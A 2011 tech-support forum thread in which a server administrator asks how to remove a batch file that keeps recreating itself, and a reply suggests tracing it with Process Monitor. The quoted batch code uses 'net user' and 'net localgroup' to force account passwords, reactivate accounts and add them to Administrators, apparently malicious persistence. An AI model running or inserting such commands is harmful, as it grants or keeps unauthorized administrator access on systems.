Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

delete batch programm


  • Please log in to reply
1 reply to this topic

#1 comboraj

comboraj

  • Members
  • 1 posts
  • OFFLINE
  •  
  • Local time:02:25 PM

Posted 25 November 2011 - 04:57 AM

we have an 2003 r2 server with sql server ,visual basic ,iis(asp, .net) installed. basically we use for developing in house web application .

problem: an batch program is preventing change administrator and other user password and other properties.code of batch program as follows
------------------------------------------------------------------------------
net user administrator ****** /expires:never /passwordchg:yes /active:yes >>c:\log.txt
net localgroup Administrators administrator /add >>c:\log.txt
net user user ****** /expires:never /passwordchg:yes /active:yes >>c:\log.txt
net localgroup ariv administrator /add >>c:\log.txt
net user aspnet_iis ****** /expires:never /passwordchg:yes /active:yes >>c:\log.txt
net localgroup aspnet_iis administrator /add >>c:\log.txt

net user administrator ****** /expires:never /passwordchg:yes /active:yes >>c:\log.txt
net localgroup Administrators administrator /add >>c:\log.txt
net user user ****** /expires:never /passwordchg:yes /active:yes >>c:\log.txt
net localgroup ariv administrator /add >>c:\log.txt
net user aspnet_iis ****** /expires:never /passwordchg:yes /active:yes >>c:\log.txt
net localgroup aspnet_iis administrator /add >>c:\log.txt

copy C:\Program Files\user.bat C:\Program Files\user.txt >> log.txt
--------------------------------------------------------------------------

If delete the this batch program it is recreated.If edited and saved then it will show saved but if viewed again its not showing edited matter(show old code as shown above).If renamed it will recreate another batch prgramme with old file name and code


i have doubt that batch program is created by some software developed by in house .if it is so how to trace it and remove it.

please help me to remove this batch file ,

Edit: Moved topic from Introductions to the more appropriate forum. ~ Animal

BC AdBot (Login to Remove)

 


#2 thefr34k

thefr34k

  • Members
  • 16 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:North Carolina, USA
  • Local time:04:55 AM

Posted 01 December 2011 - 01:37 PM

There is likely an easier solution than this but the way I would do it is run ProcessMonitor on the server. Filter it to just that directory and delete the file. You should see it log an action of what program is recreating the file. I would guess it is either a service or an exe running in background watching that folder to see if the file gets deleted or altered.

Edit: I am sure you know this but be careful changing passwords on the administrative accounts usually a whole bunch of stuff breaks when you do that on a server

Edited by thefr34k, 01 December 2011 - 01:38 PM.





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users